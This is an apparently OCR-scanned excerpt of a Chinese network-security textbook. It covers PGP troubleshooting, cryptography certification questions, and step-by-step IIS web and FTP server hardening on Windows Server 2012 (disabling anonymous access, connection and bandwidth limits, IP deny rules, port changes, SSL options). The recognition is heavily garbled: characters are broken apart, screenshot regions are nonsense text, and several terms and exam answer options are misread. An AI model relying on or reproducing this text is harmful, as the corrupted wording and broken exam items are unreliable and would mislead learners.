图 12-28 ”选择 “清除 缓存 ”命令 
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2. 系统 托盘 中 的 PGP 图 标 不 见 了 该 如 何 处 理 ? 

答 : 如 果 不 小 心 退出 PGP 服务 导致 系统 托盘 中 的 PGP 图 标 不 见 了 ,可 以 选择 * 开 
始 ” 一 “所 有 程序 ”>PGP Desktop 命令 .打开 PGP 主 界面 ,再 选择 “工具 ”一 “选项 ”命令 ， 
弹出 *PGP 选项 ”对 话 框 。 选 中 “显示 PGP 图 标 在 Windows 系统 托盘 ” 复 选 框 , 单 击 “ 确 
定 ” 按 钮 ,如 图 12-29 所 示 。 





图 12-29 ”PGP 选项 设置 


12.6 认证 试题 


一 、 选 择 题 


1. 加 密 算法 按照 密 钥 的 类 型 可 以 分 为 (  )。 
A. 非 对 称 密码 加 密 算 法 和 对 称 密 钥 加 密 算法 
B. 公开 密 钥 加 密 算法 和 分 组 密码 算法 
C. 序列 密码 算法 和 分 组 密码 算法 
D. 序列 密码 算法 和 公开 密 钥 加 密 算法 
2. 数据 的 加 密 和 解密 是 对 数据 进行 的 某 种 变换 ,加 密 和 解密 的 过 程 都 是 在 ( ) 的 
控制 下 进行 的 。 
A. 明文 B; 密 交 C. 信息 D. 密 钥 
3. 下 面 说 法 正确 的 是 ( )。 
A. 信息 隐蔽 是 加 密 的 一 种 方法 
B. 没有 密 钥 , 只 要 知道 加 密 程序 的 细节 就 可 以 对 信息 进行 解密 
C. 密 钥 的 位 数 越 多 ,信息 的 安全 性 越 高 
D. 加 密 包括 对 称 加 密 和 非 对 称 加 密 
4. 公开 密 钥 算法 中 加 密 密 钥 即 (  ”)。 
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A. 解密 密 钥 B. 私密 密 钥 C. 公开 密 钥 D. 私有 密 角 
5. 为 了 防止 冒名 发 送 数据 信息 或 发 送 后 不 承认 的 情况 出 现 , 可 以 采取 的 方 
法 是 ( Ds 
A. 数字 水 印 B. 数字 签名 
C. 访问 控制 D. 发 电子 邮件 确认 


6. 数字 签名 技术 在 公开 密 钥 算 法 中 的 应 用 是 发 送 端 采 用 ( ) 对 发 送 的 信息 进行 
数字 签名 ,在 接收 端 采用 ( ) 进 行 签名 验证 。 


A. 发 送 者 的 公 B. 发 送 者 的 私 钥 

C. 接收 者 的 公 钥 D. 接收 者 的 私 钥 
7. 防止 用 户 被 冒名 欺骗 的 方法 是 ( ”)。 

A. 对 信息 源 进行 身份 验证 B. 进行 数据 加 密 


C. 对 访问 网 络 的 流量 进行 过 滤 和 保护 D. 采用 防火 墙 
8. 采用 Kerberos 系统 进行 认证 时 ,可 以 在 报 文中 加 入 ( ) 来 防止 重 放 攻 击 。 


A. 会 话 密 钥 B. 时 间 改 C. 用 户 男 D. 私有 密 钥 
9. DES 是 一 种 ( ) 算 法 。 
A. 共享 密 钥 B. 公开 密 钥 C. 报 文 摘要 D. 访问 控制 
10. 安全 电子 邮件 协议 PGP 不 支持 ( Rs 
A. 确认 发 送 者 的 身份 B. 确认 电子 邮件 未 被 修改 
C. 防止 非 授 权 者 阅读 电子 邮件 D. 压缩 电子 邮件 大 小 
11. 传输 安全 电子 邮件 的 协议 PGP 属于 ( 多 
A. 物理 层 B. 传输 层 C. 网 络 层 D. 应 用 层 
二 、 填 空 题 
1. 现实 中 通常 将 对 称 加 密 算 法 和 非 对 称 加 密 算法 混合 起 来 使 用 ,使 用 算法 
对 要 发 送 的 数据 进行 加 密 ,其 密 钥 则 使 用 算法 进行 加 密 , 这 样 可 以 综合 发 挥 这 两 
种 加 密 算法 的 优点 。 
2. PGP 加 密 系统 不 仅 可 以 对 文件 数据 进行 加 密 , 还 可 以 对 等 进 
行 加 密 。 
三 、 简 答题 


1. 简 述 DES 算法 的 基本 思想 。 
2. 使 用 PGP 加 密 系统 对 文件 进行 签名 后 ,将 签名 后 的 . sig 文件 发 送 给 对 方 的 同时 ， 
为 什么 还 要 发 送 原始 文件 给 对 方 ? 


四 、 操 作 题 


1. 如 何 利 用 PGP 加 密 系 统 加 密 邮 件 ? 
2. 如 何 利 用 PGP 加 密 系统 进行 签名 和 验证 操作 ? 
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13.1 


用 户 需 求 与 分 析 


Internet 信息 服务 (IIS) 是 一 个 用 于 配置 应 用 程序 池 或 网 站 .FTP 站 点 .SMTP 或 
NNTP 站 点 的 工具 。 利 用 IIS 管理 器 ,网 络 安全 管理 员 可 以 配置 IIS 安全 ,性 能 和 可 靠 性 
功能 ,可 添加 或 删除 站 点 ,启动 .停止 和 暂停 站 点 ,备份 和 还 原 服务 器 配置 ,创建 虚拟 目录 


以 改善 内 容 管理 等 。 





正 是 因为 IIS 具有 如 此 强大 的 功能 ,其 安全 问题 也 更 加 受到 人 们 的 
重视 ,并 需要 设置 IIS 的 安全 来 保护 系统 中 的 数据 。 


13.2 预备 知识 


起 2 1 Web 的 安全 问题 


Web 服务 是 常用 的 网 络 服务 之 一 ,通过 IIS 可 以 搭建 信息 发 布 、 信 息 查 询 .电子 商务 、 
电子 政务 等 各 种 用 途 的 Web 网 站 。Web 站 点 的 基本 配置 及 其 含义 如 表 13-1 所 示 。 



































表 13-1 Web 站 点 的 基本 配置 及 其 含义 
选 项 组 配 置 项 说 明 
说 明 显示 在 IIS 控制 台 的 名 称 , 以 区 别 各 个 站 点 
IP 地 址 Web 服务 器 对 外 的 IP 地 址 
Web 服务 器 服务 的 TCP 端口 号 ,默认 为 80。 若 更 改 则 访问 
W 示 识 |TCP 
eb 站 点 标识 |TCP 端口 时 必须 在 URL 中 指出 
SSL 端口 号 使 用 安全 套 接 字 访问 (用 https://) 的 端口 号 ,默认 为 443 
“高 级 ”按钮 除 修改 IP 地 址 、 端 口号 外 ,还 可 修改 站 点 的 主机 头 
无 限 对 同时 连接 站 点 的 用 户 数 不 做 限制 
限制 到 根据 实际 情况 限制 同时 连接 站 点 的 用 户 数 量 
连接 连接 超时 如 果 用 户 在 规定 的 时 间 内 没有 和 Web 服务 器 进行 信息 交换 ， 
则 自动 中 断 此 用 户 的 连接 
启用 保持 HTTP 激活 | 允许 客户 端 保持 与 服务 器 的 开放 连接 
志 用 来 i 问 、 错 误 等 信息 ,需要 志 
日 二 启用 日 志 记 录 日 志 用 来 记录 服务 器 的 访问 、 错 误 等 信息 ,需要 设置 日 志 格 








式 \ 日 志 记 录 内 容 和 记录 方法 等 
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另外 ,许多 基于 Web 管理 界面 的 其 他 网 络 服务 ,同样 需要 用 到 Web 服务 器 的 安全 ， 
如 邮件 服务 器 \ 流 媒体 服务 器 等 。 因 此 ,Web 服务 器 的 安全 性 将 影响 到 本 地 系统 甚至 整 
个 网 络 的 安全 性 ,必须 通过 相应 的 安全 机 制 ,控制 用 户 的 访问 。 

可 以 通过 验证 Web 站 点 的 CA 数字 证 书 来 判别 该 站 点 的 真 伪 。Web 流量 安全 在 网 
络 级 的 常用 解决 方法 是 使 用 IPSec; 在 传输 级 的 常用 解决 方法 是 使 用 安全 套 接 层 (SSL) 
或 传输 层 安全 (TLS); 在 应 用 级 的 常用 解决 方法 之 一 是 使 用 安全 的 电子 交易 (SET) 。 
Web 站 点 的 四 级 访问 控制 是 IP 地址 限制 ,用户 验证 .Web 权限 .NTFS 权限 。IE 的 4 个 
区 域 分 别 是 Internet 区 域 .本 地 Intranet 区 域 . 可 信 站 点 区 域 和 受 限 站 点 区 域 等 。 

安全 套 接 层 (SSL) 位 于 HTTP 层 和 TCP 层 之 间 ,建立 客户 机 与 服务 器 之 间 的 加 密 
通信 ,以 确保 HTTP、FTP、SMTP、POP3、Telnet 等 服务 信息 传递 的 安全 性 。SSL 协议 包 
括 SSL 记录 协议 和 SSL 握手 协议 等 两 个 子 协议 。 其 中 ,记录 协议 位 于 握手 协议 之 下 , 主 
要 为 SSL 连接 提供 机 密 性 和 报 文 完整 性 服务 。SSL 握手 协议 被 封装 在 SSL 记录 协议 中 ， 
它 允 许 服务 器 与 客户 机 在 应 用 程序 传输 和 接收 数据 之 前 互相 认证 ,协商 加 密 算法 (RSA、 
DH 等 ) 和 密 钥 。 密 钥 协 商 使 用 非 对 称 ( 公 钥 ) 密 钥 体制 进行 。 

在 IIS 6.0 中 ,Web 服务 器 管理 员 必 须 首先 安装 Web 站 点 数字 证 书 , 然 后 Web 服务 
器 才能 支持 SSL 会 话 ,数字 证 书 的 格式 遵循 ITU-T X. 509 标准 。 通 常情 况 下 ,数字 证 书 
需要 由 证 书 认证 机 构 (CA) 颁 发 。 
822 FP 的 安全 问题 

FTP 服务 主要 用 于 实现 在 FTP 服务 器 和 FTP 客户 端 之 间 传 送 文件 。 通 过 FTP 服 
务 ,可 以 实现 软件 的 下 载 .文件 的 交换 与 共享 以 及 Web 站 点 的 维护 。 很 多 网 络 管理 员 或 


安全 工程 师 在 维护 服务 器 时 所 使 用 的 FTP 系统 在 工作 中 非常 重要 ,但 是 一 般 都 不 公开 或 
者 很 少 公开 ,所 以 安全 性 往往 得 不 到 足够 的 重视 ,成 为 很 多 攻击 者 喜欢 攻击 的 目标 。 











13.3 方案 设计 
方案 设计 如 表 13-2 所 示 。 
表 13-2 方案 设计 
任务 名 称 Internet 信息 服务 的 安全 设置 
1. Windows Server 2012 Web 服务 器 的 安全 设置 
(1) 禁用 匿名 身份 验证 


(2) 限制 访问 Web 网 站 的 客户 端 数 量 

(3) 使 用 “限制 带宽 使 用 ”限制 客户 端 访 问 Web 网 站 

(4) 使 用 “IPv4 地 址 限制 "限制 客户 端 计算 机 访问 Web 网 站 
2. Windows Server 2012 上 构建 高 安全 性 的 FTP 服务 器 
(1) 设置 耻 地 址 和 端口 

(2) 其 他 配置 


任务 分 解 
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能 力 目标 


a we 


.能 设置 Web 服务 器 的 “用 户 身份 验证 ”访问 方式 
.能 通过 带宽 限制 进行 Web 服务 器 的 身份 验证 

. 能 通过 IP 地 址 限制 进行 Web 服务 器 的 身份 验证 
. 能 限制 访问 Web 服务 器 的 客户 端 数量 

. 能 修改 FTP 的 IP 地 址 和 默认 端口 





知识 目标 


1. 了 解 Web 服务 器 的 安全 问题 


. 了解 FTP 服务 器 的 安全 问题 





素质 目标 





.树立 较 强 的 安全 意识 

. 掌握 网 络 安全 行业 的 基本 情况 

. 培养 职业 兴趣 ,能 爱 岗 敬业 、 热 情 主动 的 工作 态度 
.培养 良好 的 职业 道德 

. 具有 可 持续 发 展 能 力 


13.4 项 目 实施 


41 任务 1: Wndows Server 20I12 Web 服 务 器 的 安全 设置 


1. 任务 目标 


Web 服务 已 经 成 为 众多 网 络 的 必 备 服务 ,被 用 来 提供 信息 发 布 . 邮 件 查询 .电子 商 
务 、 网 络 办 公 等 网 络 平台 ,但 是 ,一 般 用 户 都 是 在 对 Web 安全 了 解 甚 少 的 情况 下 使 用 的 。 
Web 服务 的 安全 直接 决定 多 种 网 络 服务 的 安全 ,涉及 整个 网 络 的 安全 ,因此 本 任务 通过 
对 Web 服务 器 的 简单 配置 ,获得 安全 可 靠 的 网 络 平台 。 


2. 工作 任务 


(1) 禁用 匿名 身份 验证 。 

(2) 限制 访问 Web 网 站 的 客户 端 数量 。 

(3) 使 用 “限制 带宽 使 用 ”限制 客户 端 访问 Web 网 站 。 

(4) 使 用 “IPv4 地 址 限制 ?限制 客户 端 计算 机 访问 Web 网 站 。 


3. 工作 环境 


(1) 一 台 预 装 Web 服务 器 的 Windows Server 2012 主机 。 
(2) 两 台 预 装 Windows 7 系统 主机 。 


4. 实施 过 程 


(1) 禁用 匿名 身份 验证 。 设 置 Web 服务 器 安全 ,使 所 有 用 户 不 能 匿名 访问 Web 服 
务 器 ,而 只 能 以 Windows 身份 验证 访问 ,具体 的 操作 步骤 如 下 。 
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@ 启动 IIS, 展 开 左 侧 的 “网 站 ”目录 树 , 单 击 网 站 test web, 在 “功能 视图 ”界面 中 找 
到 “身份 验证 ”, 并 双击 打开 ,可 以 看 到 Web 网 站 默认 启用 “匿名 身份 验证 ”, 也 就 是 说 , 任 
何人 都 能 访问 Web 服务 器 ,如 图 13-1 所 示 。 


和 ，WIN2012-1 ， 网 站 ，testweb ， Bd 








| 


WIN2012-1 (WIN2012-1\Administrator) 


4 国 网 站 
上 多 Defauk Web Site 
人 @ testweb 





























国 贡 图 | 民 内 容 视图 


配置 "localhost” applicationHost.config , <location path="test web"> 








图 13-1 默认 启用 匿名 身份 验证 


@ 选择 “匿名 身份 验证 ”选项 ,然后 单 击 “ 操 作 ” 界 面 中 的 “禁用 ”按钮 , 即 可 禁用 Web 
服务 器 的 匿名 访问 ,此 时 在 客户 端 访问 Web 服务 器 ,会 出 现 拒绝 访问 提示 ,如 图 13-2 











所 示 。 
401 - 未 授权 由 于 凭据 无 效 ， 访 问 被 拒绝 。 Windows Internet Explorer -1Dl xj| 
GO Ee] http://192. 168. 72. 130/ [ells][x] PBing 
认 收 肯 夫 | 光世 ] 建 WB 。 尼 ] 网 页 快讯 备 - 
种 401 - 未 授权 由 于 任 所 无效, 访 价 - 国 -一 有 吉 ” 页 耐 f)- 安全 6)- 工具 中 大 
服务 器 错误 
401 - 未 授权 : 由 于 凭据 无 效 ， 访 问 被 拒绝 。 
您 无 权 使 用 所 提供 的 鞠 据 查看 此 目录 或 页 面 。 司 





厂矿 厂 同 imternet | 便 j 梳 式 : 村 用 [| 有 10 ”用 
图 13-2 ”拒绝 访问 提示 信息 


@ 在 如 图 13-3 所 示 的 “身份 验证 ”窗口 中 ,选择 “Windows 身份 验证 ”选项 ,然后 单 击 
“操作 ”界面 中 的 “启用 ”按钮 , 即 可 启用 该 身份 验证 方法 。 

@ 在 客户 端 计算 机 上 ,打开 浏览 器 ,输入 网 址 访问 Web 服务 器 ,弹出 如 图 13-4 所 示 
“Windows 安全 ”对 话 框 ,输入 能 被 Web 服务 器 进行 身份 验证 的 用 户 账户 名 和 密码 进行 
访问 ,然后 单 击 “ 确 定 ” 按 钮 , 即 可 访问 Web 服务 器 ,如 图 13-5 所 示 。 











四 ，WIN2012-1 ， 网 站 ， testweb ， 


文件 (视图 (V) 。 帮助 (H) 









































@&- 国 | 自 | 信 急 身份 验证 从 没有 为 此 网 站 启用 SSL , 格 
过 电 绩 以 明文 形式 发 送 任 
二 把 页 分 引信 振 : 不 进行 9 组 ~ = 
4 | WIN2012-1 (WIN2012-1\Administrator) 
应 用 程序 池 名 称 宇 状态 
4 国 网 站 ASPNET 模拟 用 
多 Defauk Web Site Windows 身份 验证 已 闽 用 
@ testweb 基本 身份 验证 BB 有 
匿名 身份 验证 有 
接 要 式 身份 验证 用 
< 而 > 
< 而 ;| 辐 机 现 男 | 局 内 窜 视 加 

















配置 localhost" applicationHostconfig , <location path="test web-> 


图 13-3 启用 Windwos 身份 验证 







位 于 192. 168. 72. 130 的 服务 器 192. 168. 72. 130 要 求 用 户 名 和 密码 。 
话 好 和 要 求 以 不 安全 的 方式 改 送 您 的 用 户 名 和 古 码 ( 纳 有 安全 连 撞 












http://192. 168. 72. 130/ — Windows Internet Explerer 


GO /er alexpi: el 
窗 由 二 天 | 坟 县 ] 建 让 有] 网 克 快讯 库 ~ 

















本 出 ”页面 中 ”安全 5) ”工具 0) - 司 - 


图 13-5 客户 端正 常 访问 Web 服务 器 窗口 


@ 在 Web 服务 器 端 设置 目录 属性 ,设置 特定 用 户 拥有 读 取 、 列 文件 目录 和 运行 的 
权限 。 
(2) 限制 访问 Web 网 站 的 客户 端 数量 。 设 置 “限制 连接 数 " 限 制 访问 Web 服务 器 的 
户 数量 为 1, 具 体操 作 步 又 如 下 。 
@ 打开 “Internet Information Services(IIS) 管 理 器 ”控制 台 , 展 开 “ 网 站 ”节点 , 单 击 





省 
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网 站 test web, 然 后 在 “操作 ”界面 中 单 击 “ 配 置 "区域 的 “限制 "按钮 ,如 图 13-6 所 示 。 


图 ，WIN2012-1 网 站 ，testweb ， on 


文件 (有 。 视图 (V) ”帮助 (H) 


@.- 目 | 由 | 全 @ test web 主页 圭 看 应 用 程序 
en 查看 去 拟 目录 


4 全 WIN2012-1 (WIN2012-1\Administrator) 管理 网 站 
| -局 让 有 BF 地 重新 启动 








" 
允 

4 国 网 站 ey, [= 
a 


动 
多 Default Web Site 停止 
| estweb 





浏览 网 站 
加 浏览 192.16872.130.80 
(http) 





























图 13-6 “Internet Information Services(IIS) 管 理 器 ”控制 台 (1) 


@ 在 打开 的 “编辑 网 站 限制 "对话 框 中 ,选中 “限制 连接 数 " 复 选 框 ,并 设置 要 限制 的 
连接 数 为 1, 单 击 “ 确 定 " 按 钮 即 可 完成 限制 连接 数 的 设置 ,如 图 13-7 所 示 。 
































13-7 设置 “限制 连接 数 ” 


@ 在 Web 客户 端 计算 机 上 测试 限制 连接 数 ,在 客户 端 计算 机 1 上 ,打开 浏览 器 , 输 
入 网 址 访问 Web 服务 器 ,访问 正常 。 在 客户 端 计算 机 2 上 ,打开 浏览 器 ,输入 网 址 访问 
Web 服务 器 ,显示 如 图 13-8 所 示 界 面 ,表示 超过 网 站 限制 连接 数 。 

(3) 使 用 “限制 带宽 使 用 ”限制 客户 端 访问 Web 网 站 。 设 置 要 限制 的 带宽 为 1024 字 
节 , 具 体 的 操作 步骤 如 下 。 

@ 打开 “Internet 信息 服务 (IIS) 管 理 器 ”控制 台 , 展 开 “ 网 站 ”节点 , 单 击 网 站 test 








Service Unavailable 





HTTP Error 503. The service is unavailable. 
-ll ell FE 
图 13-8 访问 Web 服务 器 时 超过 网 站 限制 连接 数 
web, 然 后 在 “操作 ”界面 中 单 击 * 配 置 ?区 域 的 “限制 ?按钮 ,如 图 13-6 所 示 。 
@ 在 打开 的 “编辑 网 站 限制 ?对 话 框 中 ,选中 “限制 带 宽 使 用 ( 字 节 )” 复 选 框 ,并 设置 
要 限制 的 带宽 为 1024 字 节 , 单 击 “ 确 定 ” 按 钮 即 可 完成 限制 带宽 使 用 的 设置 ,如 
图 13-9 所 示 。 


















































图 13-9 设置 “限制 带宽 使 用 ” 


G 在 Web 客户 端 计算 机 1 上 ,打开 浏览 器 ,输入 网 址 访问 Web 服务 器 ,发 现 网 速 非 
常 慢 , 这 是 因为 设置 了 带宽 限制 的 原因 。 

(4) 使 用 “IPv4 地 址 限制 ?限制 客户 端 计算 机 访问 Web 网 站 。 使 用 用 户 验 证 的 方式 ， 
每 次 访问 该 Web 站 点 都 需要 输入 用 户 名 和 密码 ,对 于 授权 用 户 而 言 比 较 麻 烦 。 由 于 IIS 
会 检查 每 个 来 访 者 的 IP 地 址 ,因此 可 以 通过 限制 IP 地 址 的 访问 ,防止 或 运行 某 些 特定 的 
计算 机 、 计 算 机组、 域 甚至 整个 网 络 访问 Web 服务 器 。 使 用 “IPv4 地 址 限制 ?限制 IP 地 
址 范围 为 192. 168. 10. 0/24 的 客户 端 计算 机 访问 Web 服务 器 ,具体 的 操作 步骤 如 下 。 

@ 在 Web 服务 器 上 打开 “Internet Information Services(JIS) 管 理 器 ”控制 台 , 展 开 
“网 站 ”节点 ,然后 在 “功能 视图 ”界面 中 找到 “IP 地 址 和 域 限制 ”, 如 图 13-10 所 示 。 
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图 13-10 IP 地 址 和 域 限制 


@ 双击 “功能 视图 "界面 中 的 “IP 地 址 和 域 限制 "命令 ,打开 “IP 地 址 和 域 限 制 ?设置 
界面 , 单 击 “ 操 作 ” 界 面 中 的 “添加 拒绝 条 目 ” 选 项 ,如 图 13-11 所 示 。 


入， WIN2012-1 ， 网 站 ，testweb ， 97 








让 级 去 
4 | WIN2012-1 (WIN2012-1\Administrator) 
局 EF 
4 国 网 站 
?人 Defauk Web Sie 


|@ testweb 




















配置 :localhost” applicationHostconfig ,<location path="test web”> 





图 13-11 “IP 地 址 和 域 限制 设置 界面 


@ 在 打开 的 “添加 拒绝 限制 规则 ”对 话 框 中 , 单 击 “ 特 定 IP 地 址 ” 单 选 按钮 ,并 设置 要 
拒绝 的 IP 地址 范围 为 192. 168. 10.0. 掩 码 为 255. 255. 255. 0, 如 图 13-12 所 示 , 最 后 单 击 
“确定 ”按钮 ,完成 IP 地 址 的 限制 。 


项 目 13 Internet 信 息 服务 的 安全 设置 











轿 IP 地 址 范围 (R): 





192.168.10.0 
掩 码 或 前 缀 (M): 
255.255.255.0 




















13-12 ”添加 拒绝 限制 规则 


@ 在 客户 端 计 算 机 1 上 ,打开 浏览 器 ,输入 网 址 访问 Web 服务 器 ,显示 错误 号 为 


“403- 禁 止 访 问 : 访问 被 拒绝 ”, 说 明 客户 端 计算 机 的 IP 地 址 在 被 拒绝 访问 Web 服务 器 的 
范围 内 ,如 图 13-13 所 示 。 


Oe we pe] Sses ness ,EER 


HTTP 错 总 403.503 - Forbidden 
您 无 权 查看 此 目录 或 页 面 。 


http://192.168.72.130:80/ 


lpRestrictionModule 请 求 的 UR 
BeginRequest 
StaticFile 物理 路 径 。C:\web 
Ox80070005 登录 方法 。 尚未 确定 

登录 用 户 。 尚未 奖 定 





图 13-13 访问 被 限制 
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世 42 任务 2: Wndows Server DI12 上 构建 高 安全 性 的 FIP 服 务 器 
1. 任务 目标 


广大 直面 各 种 网 络 攻 击 的 网 络 管理 员 、 网 络 安全 工程 师 在 工作 中 必然 会 遇 到 各 种 各 
样 的 FTP 攻击 ,如 何在 满足 自己 日 常 所 需 功 能 的 前 提 下 ,构建 一 个 方便 、 快 捷 、 并 且 安 全 
性 足够 强 的 FTP 服务 器 就 成 了 必须 解决 的 问题 。 本 任务 主要 完成 如 何 使 用 IIS FTP 
Server 构建 足够 网 络 管理 员 维 护 使 用 的 FTP 服务 器 ,而 且 安全 性 足够 高 。 


2. 工作 任务 


(1) 设置 IP 地 址 和 端口 。 
(2) 其 他 配置 。 


3. 工作 环境 


(1) 一 台 预 装 FTP 服务 器 的 Windows Server 2012 主机 。 
(2) 两 台 预 装 Windows 7 系统 主机 。 


4. 实施 过 程 


FTP 服务 器 的 配置 和 Web 服务 器 相 比 要 简单 得 多 ,主要 是 站 点 的 安全 性 设置 ,包括 
指定 不 同 的 授权 用 户 , 如 允许 不 同 权限 的 用 户 访问 ,允许 来 自 不 同 IP 地 址 的 用 户 访问 ,或 
限制 不 同 IP 地 址 的 不 同 用 户 的 访问 等 。 再 就 是 和 Web 服务 器 一 样 ,FTP 服务 器 也 要 设 
置 FTP 站 点 的 主 目录 和 性 能 等 。 

(1) 设置 IP 地 址 和 端口 。 

@ 在 FTP 服务 器 的 “Internet Information Services(IIS) 管 理 器 ”控制 台 树 中 ,依次 展 
开 FTP 服务 器 ,选择 FTP 站 点 test ftp, 然 后 单 击 “ 操 作 ” 界 面 中 的 “ 绑 定 ”按钮 ,如 
图 13-14 所 示 。 


@'@, WN2021 » RS » testhp » 
文件 (R) 视图 (V) 。 帮助 (H) 


























@- 目 | 轨 | 多 全 testftp 页 BD ns 
网 EM 页 本 从 引 R 限 
2 WIN20121 WIN2012-1Wdminisraton | = | 
局 ee 二 加 二 - 
4 国 网 6 
re I 
@ testweb FTp 印 地 址 ”FTP SSL 设 FTP 当前 会 查看 应 用 程序 
国人 和 sR 和 村 适 坦 看 起 所 目录 
号 管理 FTP 站 点 © 
FTP 防火 培 ”FTP 目录 浏 ”FTP 请 条 篇 pe 
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图 13-14 “Internet Information Services(IIS) 管 理 器 ”控制 台 (2) 
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@ 弹出 “网 站 绑 定 ”对 话 框 ,如 图 13-15 所 示 。 





总 口 IP 地址 


21 192.168.72.130 















































图 13-15 “网 站 绑 定 ”对话 框 
G 选择 ftp, 单 击 “ 编 辑 ” 按 钮 .完成 IP 地 址 和 端口 号 的 更 改 , 比 如 改 为 2121, 如 
图 13-15 所 示 。 


@ 测试 FTP 站 点 。 用 户 在 客户 端 计 算 机 上 打开 浏览 器 或 资源 管理 ,输入 ftp:// 
192. 168.72. 130:2121, 即 可 访问 刚才 建立 的 FTP 服务 器 ,如 图 13-16 所 示 。 





~ 个 | 锚 hpy/192.168.72.130.2121/ v| | | 法 于 "192.168.72.130" 


目 ouointd 














级 出 /访问 的 位 置 





图 13-16 使 用 2121 端口 访问 FTP 服务 器 


@@ 为 了 后 面 的 实验 继续 完成 ,测试 完毕 ,请 再 将 端口 号 改 为 默认 值 , 即 21。 

(2) 其 他 配置 。 

@ 在 “Internet 信息 服务 (IIS) 管 理 器 ?控制 台中 ,展开 * 网 站 ?节点 ,选择 FTP 站 点 
test ftp, 然 后 分 别 进行 “FTP SSL 设置 ”*FTP 当前 会 话 ”“FTP 防火 墙 支持 “FTP 目录 浏 
览 ”*FTP 请 求 筛选 FTP 日 志 ”“FTP 身份 验证 ”FTP 授权 规则 ”FTP 消息 ”“FTP 用 
户 隔离 等 内 容 的 设置 或 浏览 ,如 图 13-17 所 示 。 

@ 在 “操作 ”界面 中 ,可 以 进行 “浏览 “编辑 权限 ”“ 绑 定 ”“ 基 本 设置 “查看 应 用 程序 ” 
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图 13-17 “test ftp 主页 ”窗口 


“查看 虚拟 目录 ”“ 重 新 启动 FTP 站 点 “启动 或 停止 FTP 站 点 ”和 ”高 级 设置 "等 操作 。 


13.5 常见 问题 解答 


“安全 通信 ”对 话 框 中 “忽略 客户 端 证 书 “ 接 受 客 户 端 证 书 ”" 和 “要 求 客户 端 证 书 ”3 个 
单 选 按钮 的 区 别 是 什么 ? 

答 : SSL 协议 支持 的 是 服务 器 端 验证 ,通过 客户 端 对 服务 器 端的 数字 证 书 进行 验证 
完成 ,而 对 客户 端的 验证 是 可 选 的 ,因此 在 “安全 通信 ”对 话 框 中 有 3 个 单 选 按钮 可 以 选 
择 。 三 者 的 区 别 是 :“ 忽 略 客户 端 证 书 ” 是 指 服务 器 端 不 向 客户 端 发 送 请 求 客 户 端 证 书 的 
消息 。“ 接 受 客 户 端 证 书 ” 是 指 服 务 器 端 向 客户 端 发 送 请 求 客 户 端 证 书 的 消息 ,但 不 要 求 
客户 端 必须 提供 证 书 , 即 服务 器 端 可 以 容忍 客户 不 具备 证 书 。“ 要 求 客 户 端 证 书 ” 是 指 服 
务 器 端 向 客户 端 发 送 请 求 客户 端 证 书 的 消息 ,并 强制 要 求 客户 端 必 须 提 供 证 书 , 否 则 通信 
将 中 断 。 如 果 要 求 Web 服务 器 既 可 以 接收 HTTP 请 求 ,也 可 以 接收 HTTPS 请 求 ,并 要 
求 客户 端 提供 数字 证 书 , 则 需要 选择 “接受 客户 端 证 书 ” 单 选 按钮 ,注意 不 要 选中 “要 求 安 
全 通道 (SSL)” 复 选 框 。 如 果 Web 服务 器 管理 员 希 望 Web 服务 器 只 接收 HTTPS 请 求 ， 
并 要 求 客户 IE 和 Web 服务 器 之 间 实 现 128 位 加 密 , 并 且 不 要 求 客户 端 提供 数字 证 书 , 则 
需要 选中 “要 求 安全 通道 (SSL)" 复 选 框 和 “要 求 128 位 加 密 ” 复 选 框 ,并 选择 “忽略 客户 端 
证 书 ” 单 选 按钮 。 如 果 选 中 “要 求 安全 通道 (SSL)" 复 选 框 ,并 选择 “要 求 客户 端 证 书 ” 单 选 
按钮 ,那么 Web 服务 器 将 对 客户 端 证 书 进行 强制 验证 。 











13.6 认证 试题 


一 、 选 择 题 
1. 以 下 用 于 在 网 络 应 用 层 和 传输 层 之 间 提 供 加 密 方案 的 协议 是 ( 。 )。 
A. PGP B. SSL C. IPSec D. DES 


2. 某 Web 网 站 向 CA 申请 了 数字 证 书 。 用 户 登 录 该 网 站 时 ,通过 验证 ( ) ,可 确 
认 该 数字 证 书 的 有 效 性 ,从 而 息 


(1) A. CA 的 签名 B. 网 站 的 签名 
C. 会 话 密 钥 D. DES 密码 

(2) A. 向 网 站 确认 自己 的 身份 B. 获取 访问 网 站 的 权限 
C. 和 网 站 进行 双向 认证 D. 验证 该 网 站 的 真 伪 


人 ) 不 属于 PKI CA( 认 证 中 心 ) 的 功能 。 
A. 接受 并 验证 最 终 用 户 数字 证 书 的 申请 
B. 向 申请 者 颁发 或 拒绝 颁发 数字 证 书 
C. 产生 和 发 布 证 书 废止 列表 (CRL) ,验证 证 书 状态 
D. 业务 受理 点 LRA 的 全 面 管理 
4. 为 保障 Web 服务 器 的 安全 运行 ,对 用 户 要 进行 身份 验证 。 关 于 Windows Server 
2003 中 的 “集成 Windows 身份 验证 ”, 下 列 说 法 中 错误 的 是 ( je 
A. 在 这 种 身份 验证 方式 中 ,用 户 名 和 密码 在 发 送 前 要 经 过 加 密 处 理 , 所 以 是 一 种 
安全 的 身份 验证 方案 
B. 这 种 身份 验证 方案 结合 了 Windows NT 质询 /响应 身份 验证 和 Kerberos v5 
身份 验证 两 种 方式 
C， 如 果 用 户 系 统 在 域 控制 器 中 安装 了 活动 目录 服务 ,而 且 浏览 器 支持 Kerberos 
v5 身份 验证 协议 , 则 使 用 Kerberos v5 身份 验证 
D. 客户 机 通过 代理 服务 器 建立 连接 时 ,可 采用 集成 Windows 身份 验证 方案 进行 
验证 
5. 实现 保密 通信 的 SSL 协议 工作 在 HTTP 层 和 ( ) 层 之 间 。SSL 加 密 通 道 的 建 
立 过 程 如 下 : 首先 客户 端 与 服务 器 建立 连接 ,服务 器 把 它 的 ( ) 发 送 给 客户 端 客户 
端 随机 生成 ( ) ,并 用 从 服务 器 得 到 的 公 钥 对 它 进 行 加 密 ,通过 网 络 传送 给 服务 器 ; 服 
务 器 使 用 ( ) 解 密 得 到 会 话 密 钥 ,这 样 客户 端 和 服务 器 端 就 建立 了 安全 通道 。 


A. TCP B. IP C. UDP D. 公 钥 
E. 私 钥 F. 对 称 密 钥 G. 会 话 密 钥 
H. 数字 证 书 I. 证 书 服务 
6. 在 安装 SSL 时 ,在 “身份 验证 方法 "对话 框 中 应 选用 的 登录 验证 方式 是 ( Na 
A. 匿名 身份 验证 B. 基本 身份 验证 


C. 集成 Windows 身份 验证 D. 摘要 式 身份 验证 
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7. 若 FTP 服务 器 开启 了 匿名 访问 功能 ,匿名 登录 时 需要 输入 的 用 户 名 是 ( 


A. root B. user 





C. guest D. anonymous 
8. 〈 ) 协 议 主要 用 于 加 密 机 制 。 
